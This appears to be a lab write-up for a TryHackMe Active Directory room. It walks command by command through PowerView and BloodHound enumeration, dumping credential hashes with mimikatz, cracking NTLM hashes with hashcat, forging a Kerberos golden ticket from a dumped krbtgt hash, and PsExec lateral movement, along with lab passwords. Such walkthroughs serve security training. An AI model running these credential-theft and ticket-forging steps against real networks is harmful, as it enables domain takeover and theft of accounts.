Room Link:
Presteps for Lab
SharpHound Installation
SharpHound version on the box is too old for the current version of Bloodhound so I had to update it.
Copy git clone
scp -r BloodHound/Collectors/SharpHound.ps1 Administrator@$VICTIM:C:/Users/Administrator/
Password: P@$$W0rd
Added this line to SharpHound.ps1 before transfering so I could run the command right away
Copy powershell -ep bypass
BloodHound Installation
Copy apt-get install bloodhound
neo4j console
Enumeration w/ Powerview
Copy ssh Administrator@$VICTIM
Password: P@$$W0rd
Run below to be able to run PowerView commands.
Copy powershell -ep bypass
. .\Downloads\PowerView.ps1
Enumerate the domain users.
Copy Get-NetUser | select cn
Enumerate the domain groups.
Copy Get-NetGroup -GroupName *admin*
Find Shared folders.
Get Operating systems on the network.
Copy Get-NetComputer -fulldata | select operatingsystem
Enumeration w/ Bloodhound
Setup and get loot with Bloodhound.
Copy powershell -ep bypass
. .\Downloads\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName
Transfer Bloodhound results back to Kali. SCP can be used in this case
Copy scp Administrator@$VICTIM:C:/Users/Administrator/
Password: P@$$W0rd
Mapping the network w/ BloodHound
Copy bloodhound --no-sandbox
We can just drag the zip file to bloodhound to import it.
Find all Domain Admins
List all Kerberostable accounts
Dumping hashes w/ mimikatz
Copy ssh Administrator@$VICTIM
Password: P@$$W0rd
Copy cd Downloads && mimikatz.exe
Victim - Mimikatz
Copy privilege::debug
lsadump::lsa /patch
Copy to Kali output back to Kali
Output only the hashes and remove all duplicates into a new file.
Copy cat hashes.txt | grep NTLM | awk -F ":" '{print $2}' | grep "\S" | sed 's/^[ \t]*//' | sort | uniq > hash.txt
Copy hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --show
Golden Ticket Attacks w/ mimikatz
Copy ssh Administrator@$VICTIM
Password: P@$$W0rd
Dump the krbtgt Hash
Copy cd downloads && mimikatz.exe
This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket. Take note of what is outlined in red you'll need it to create the golden ticket.
Victim - Mimikatz
Copy privilege::debug
lsadump::lsa /inject /name:krbtgt
Create a Golden Ticket
Victim - Mimikatz
Copy kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
Use the Golden Ticket to access other machine
This will open a new command prompt with elevated privileges to all machines.Access other Machines! - You will now have another command prompt with access to all other machines on the network.
Victim - Mimikatz
This doesn't actually work. Because of how tryhackme is setup but you would then be able to access other machines. In the example below you'd need to find out what other machines exists to pull this off.
Copy dir \\Desktop-1\c$
PsExec.exe \\Desktop-1 cmd.exe
Enumeration w/ Server Manager
Copy rdesktop -d CONTROLLER -u Administrator $VICTIM
Password: P@$$W0rd
Open Active Directory